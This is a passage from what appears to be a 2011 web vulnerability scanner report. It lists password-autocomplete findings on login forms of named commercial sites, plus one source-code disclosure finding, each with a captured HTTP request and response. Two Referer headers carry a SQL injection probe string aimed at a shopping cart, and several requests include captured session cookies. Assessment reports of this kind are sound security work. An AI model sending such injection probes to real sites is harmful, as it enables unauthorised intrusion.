Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:49:35 GMT
Server: Apache
Set-Cookie: CerberusPublicGUI=9f3i1skvvnpph1et7uucrkbep2; path=/; domain=support.tenable.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19773

<!doctype html>
<html lang="en">
<head>
   <title>Tenable Customer Support Portal</title>
   <meta http-equiv="content-type" content="text/html; charset=utf-8">
<link rel="stylesheet" href="cerbe
...[SNIP]...
<div class="moduleBody">
    <form action="cerberus-support-center/do_login.php" method="post">
<input type="hidden" name="form_submit" value="do_login">
...[SNIP]...
</label>
<input type="password" name="auth_pass" style="width:99%;"><br />
...[SNIP]...

16.18. http://www.afreshbunch.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.afreshbunch.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /?page=login&cmd=register HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF; __utma=1.1309413586.1303778640.1303778640.1303778640.1; __utmb=1; __utmc=1; __utmz=1.1303778640.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.1.10.1303778640; site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 29083
Content-Type: text/html
Expires: Tue, 26 Apr 2011 00:43:37 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:44:37 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
<td valign="top" class="element-row1">
                   <form method="POST" action="/?page=login&cmd=start_reg" name="register_form" id="geoform" language="JavaScript">
                   <fieldset>
...[SNIP]...
<div class="field"><input maxLength="12" name="password" size="20" type="password"></div>
...[SNIP]...
<div class="field"><input maxLength="12" name="password1" size="20" type="password"></div>
...[SNIP]...

16.19. http://www.afreshbunch.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.afreshbunch.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /?page=login HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/?page=login&cmd=approval&a=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF; __utma=1.1309413586.1303778640.1303778640.1303778640.1; __utmb=1; __utmc=1; __utmz=1.1303778640.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F; __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.4.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 15942
Content-Type: text/html
Expires: Tue, 26 Apr 2011 00:52:21 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:53:20 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
<div class="element-inner-div">


<form method="POST" name="login_form" action="/?page=login&cmd=passme">

<p>
...[SNIP]...
<td width="65%" nowrap class="element-row1-inner">
    <input TYPE="password" NAME="password" size="30"></td>
...[SNIP]...

16.20. http://www.bridgefront.com/cart/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bridgefront.com
Path:   /cart/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /cart/ HTTP/1.1
Host: www.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:25:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Set-Cookie: osCsid=agrajqhse447smnlm8470n76g7; path=/cart/; domain=bridgefront.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25447

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>BridgeFront - Shopping
...[SNIP]...
<td><form name="login" action="https://www.bridgefront.com/cart/login.php?action=process&osCsid=agrajqhse447smnlm8470n76g7" method="post">                
               <table width="100%" border="0" cellspacing="0" cellpadding="2">
...[SNIP]...
<td class="rightWording"><input type="password" name="password" maxlength="40"></td>
...[SNIP]...

16.21. http://www.bridgefront.com/cart/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bridgefront.com
Path:   /cart/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /cart/ HTTP/1.1
Host: www.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:23:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Set-Cookie: osCsid=sggkjb8k1c1rugrrvf2g0d37e3; path=/cart/; domain=bridgefront.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25447

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>BridgeFront - Shopping
...[SNIP]...
<td><form name="login" action="https://www.bridgefront.com/cart/login.php?action=process&osCsid=sggkjb8k1c1rugrrvf2g0d37e3" method="post">                
               <table width="100%" border="0" cellspacing="0" cellpadding="2">
...[SNIP]...
<td class="rightWording"><input type="password" name="password" maxlength="40"></td>
...[SNIP]...

16.22. https://www.clone-systems.com/ecommerce/checkout.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.clone-systems.com
Path:   /ecommerce/checkout.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ecommerce/checkout.php HTTP/1.1
Host: www.clone-systems.com
Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/cart.php?suggest=0&1'%20and%201%3d1--%20=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:59:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 72179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
</p>

                               <form action="#" id="LoginForm" method="post" onsubmit="ExpressCheckout.Login(); return false;">
                                   <div class="FormContainer HorizontalFormContainer NarrowFormContainer">
...[SNIP]...
<dd><input type="password" class="Textbox Field150" name="login_pass" id="login_pass" /></dd>
...[SNIP]...

16.23. https://www.clone-systems.com/ecommerce/checkout.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.clone-systems.com
Path:   /ecommerce/checkout.php

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /ecommerce/checkout.php HTTP/1.1
Host: www.clone-systems.com
Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/cart.php?suggest=0&1'%20and%201%3d1--%20=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:59:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 72179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
<div class="ExpressCheckoutContent">
                           <form method="post" action="#" id="NewBillingAddress" onsubmit="return ExpressCheckout.ChooseBillingAddress();">
   <div id="ChooseBillingAddress" style="display: none">
...[SNIP]...
<input type="hidden" class="FormFieldPrivateId" value="Password" />
   <input type="password" class="Textbox Field200 FormField" id="FormField_2" name="FormField[1][2]" value="" />
<div class="LittleNotePassword" style="display: none">
...[SNIP]...
<input type="hidden" class="FormFieldPrivateId" value="ConfirmPassword" />
   <input type="password" class="Textbox Field200 FormField" id="FormField_3" name="FormField[1][3]" value="" />
<div class="LittleNotePassword" style="display: none">
...[SNIP]...

16.24. https://www.comodo.com/login/comodo-members.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.comodo.com
Path:   /login/comodo-members.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login/comodo-members.php HTTP/1.1
Host: www.comodo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=44439b28ed50f35415dffbf574898661; __utmz=1.1303775073.1.1.utmgclid=CMO8iMjsuKgCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); ap=; referrerURL=; entryURL=http%3A//www.comodo.com/resources/webinars/e-commerce/pci-compliance-demystified.php%3Fgclid%3DCMO8iMjsuKgCFQ5-5Qodm1pYEg; wooTracker=ZQXK7Q954RCS6ZFI1HH4JS1QZ5D1UD01; sifrFetch=true; __utma=1.840845901.1303775073.1303775073.1303775073.1; __utmc=1; __utmb=1.4.10.1303775073; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 23:51:54 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 5561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="//www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Typ
...[SNIP]...
</h3>
<form name="loginForm" action="https://secure.comodo.com/products/!hostedLogin" method="post" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)" >
   <p>
...[SNIP]...
</p>
<input type="password" name="loginPassword" id="loginPassword" class="formlog" /> <input type="image" src="../images/log-on.jpg" name="submit" alt="Log on" title="Log on" class="formlogbut" />
...[SNIP]...

16.25. http://www.firstdata.com/en_us/about-first-data/media/press-releases/04_11_11  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.firstdata.com
Path:   /en_us/about-first-data/media/press-releases/04_11_11

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_us/about-first-data/media/press-releases/04_11_11 HTTP/1.1
Host: www.firstdata.com
Proxy-Connection: keep-alive
Referer: http://www.firstdata.com/en_us/home
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: countryCode=en_us; JSESSIONID=8B02942E5F37E07568A66BE00C61FBE6; __utmz=269008486.1303775197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269008486.510355525.1303775197.1303775197.1303775197.1; __utmc=269008486; __utmb=269008486.5.10.1303775197; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dfirstdataprod%253D%252526pid%25253Den_us%2525253Ahome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.firstdata.com/en_us/about-first-data/media/press-releases/04_11_11%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:00:01 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: countryCode=en_us; Expires=Sun, 14-May-2079 03:14:09 GMT; Path=/
Via: 1.1 firstdata.com
Content-Length: 33202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>First
...[SNIP]...
</p>
           <form id="emailform" name="emailform" action="https://www.firstdata.com/en_us/j_spring_security_check" method="post">
               
               <p class="formal usernamed">
...[SNIP]...
</label>
                   <input type="password" name="j_password" class="inputText formInit" />
               </p>
...[SNIP]...

16.26. http://www.firstdata.com/en_us/about-first-data/media/press-releases/04_12_11  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.firstdata.com
Path:   /en_us/about-first-data/media/press-releases/04_12_11

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_us/about-first-data/media/press-releases/04_12_11 HTTP/1.1
Host: www.firstdata.com
Proxy-Connection: keep-alive
Referer: http://www.firstdata.com/en_us/home
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: countryCode=en_us; JSESSIONID=8B02942E5F37E07568A66BE00C61FBE6; __utmz=269008486.1303775197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269008486.510355525.1303775197.1303775197.1303775197.1; __utmc=269008486; __utmb=269008486.5.10.1303775197; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dfirstdataprod%253D%252526pid%25253Den_us%2525253Ahome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.firstdata.com/en_us/about-first-data/media/press-releases/04_12_11%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:00:01 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: countryCode=en_us; Expires=Sun, 14-May-2079 03:14:09 GMT; Path=/
Via: 1.1 firstdata.com
Content-Length: 32907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>First
...[SNIP]...
</p>
           <form id="emailform" name="emailform" action="https://www.firstdata.com/en_us/j_spring_security_check" method="post">
               
               <p class="formal usernamed">
...[SNIP]...
</label>
                   <input type="password" name="j_password" class="inputText formInit" />
               </p>
...[SNIP]...

16.27. http://www.firstdata.com/en_us/home  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.firstdata.com
Path:   /en_us/home

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_us/home HTTP/1.1
Host: www.firstdata.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:46:09 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: countryCode=en_us; Expires=Sun, 14-May-2079 03:00:16 GMT; Path=/
Set-Cookie: JSESSIONID=9CF9D615DB62042608CEC3BBFAC41004; Path=/
Via: 1.1 firstdata.com
Content-Length: 25962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Home
...[SNIP]...
</p>
           <form id="emailform" name="emailform" action="https://www.firstdata.com/en_us/j_spring_security_check" method="post">
               
               <p class="formal usernamed">
...[SNIP]...
</label>
                   <input type="password" name="j_password" class="inputText formInit" />
               </p>
...[SNIP]...

16.28. https://www.mysecureconnect.com/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.mysecureconnect.com
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.aspx HTTP/1.1
Host: www.mysecureconnect.com
Connection: keep-alive
Referer: http://www.secureconnect.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=g40h4p45omjxdryp2nasdx45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 23:57:56 GMT
Content-Length: 12063


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<!-- TCP80::HTTPStatus::OK --
...[SNIP]...
<div id="container">
<form name="aspnetForm" method="post" action="login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td>
<input name="ctl00$c$loginMain$Password" type="password" id="ctl00_c_loginMain_Password" class="pagetextbox" style="width:120px;" />
<span id="ctl00_c_loginMain_PasswordRequired" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...

16.29. https://www.net-address.co.uk/manager.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.net-address.co.uk
Path:   /manager.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /manager.asp? HTTP/1.1
Host: www.net-address.co.uk
Connection: keep-alive
Referer: http://www.net-address.co.uk/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCDSACCR=FAGMHKNCNDKBICBFHMKGLJCM

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 26 Apr 2011 13:48:11 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 3865
Content-Type: text/html
Cache-control: private

<html>
<head>
<title>Net-Address UK and international domain name registration including .com and .co.uk, with control panel management</title>
<meta http-equiv="content-type" content="text/html; c
...[SNIP]...
</p>


   <form action="/account.asp" method="post" id="form1" name="form1">
   <input type="hidden" name="action" value="authenticate">
...[SNIP]...
<td><input type="password" value="" size="35" maxlength="20" name="HD_PASSWORD"></td>
...[SNIP]...

16.30. https://www.saintcorporation.com/cgi-bin/secure/customer/logon.pl  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.saintcorporation.com
Path:   /cgi-bin/secure/customer/logon.pl

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /cgi-bin/secure/customer/logon.pl HTTP/1.1
Host: www.saintcorporation.com
Connection: keep-alive
Referer: http://www.saintcorporation.com/products/order.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=23724856.1303775066.1.1.utmgclid=CKeR3cTsuKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=23724856.513666181.1303775066.1303775066.1303775066.1; __utmc=23724856; __utmb=23724856.2.10.1303775066

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:58:52 GMT
Server: Apache/2.2.15 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 2427

<html>
<head>
<link rel="stylesheet" href="../../../ext/imain.css" type="text/css">
<link rel="stylesheet" href="../../../ext/forms.css" type="text/css">
<link rel="stylesheet" href="../../../ext/widg
...[SNIP]...
<br>
<form name="lform" action="https://www.saintcorporation.com/cgi-bin/secure/customer/login.pl" enctype="application/x-www-form-urlencoded" target="fw" method="post">
Username: <input type="text" class="inputT" name="user">
Password: <input type="password" class="inputT" name="pass">
</form>
...[SNIP]...

17. Source code disclosure  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.fs.ustrust.com
Path:   /sve/js/GL/Global.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /sve/js/GL/Global.js HTTP/1.1
Host: www.fs.ustrust.com
Connection: keep-alive
Referer: https://www.fs.ustrust.com/login/login.aspx?sgt=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Bear=yPl+/7B1/5bMEMabWxvfBUcVLIn4OqeptQYsxG7yfM0=

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: https://www.fs.ustrust.com/sve/js/GL/Global.js
Last-Modified: Mon, 07 Mar 2011 15:58:14 GMT
Accept-Ranges: bytes
ETag: "0af2677e0dccb1:24f3"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 12:27:17 GMT
Content-Length: 115835

...Type.registerNamespace('Online.Platform.Web.UI.UIServices');

Online.Platform.Web.UI.UIServices.ECMSContentService = function() {
Online.Platform.Web.UI.UIServices.ECMSContentService.initial
...[SNIP]...
UI.CreateContextualGlossary(HelpIDCSV);
}
},
processReauthentication: function(isauthenticated) {
if (isauthenticated) {
//var divModalControlBehavior = $find('<%=dvmc.ClientID%>');
OnlineCommonJSFunctions._clientSideReauthBehavior.set_reauthStatus(true);
OnlineCommonJSFunctions._clientSideReauthBehavior.closeModalPopup();
}
return i
...[SNIP]...

18. Referer-dependent response  previous  next
There are 6 instances of this issue:


18.1. http://adserving.cpxinteractive.com/st  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adserving.cpxinteractive.com
Path:   /st

Request 1

GET /st?ad_type=ad&ad_size=728x90&section=1712152 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nuclearpesticide.com/?epl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
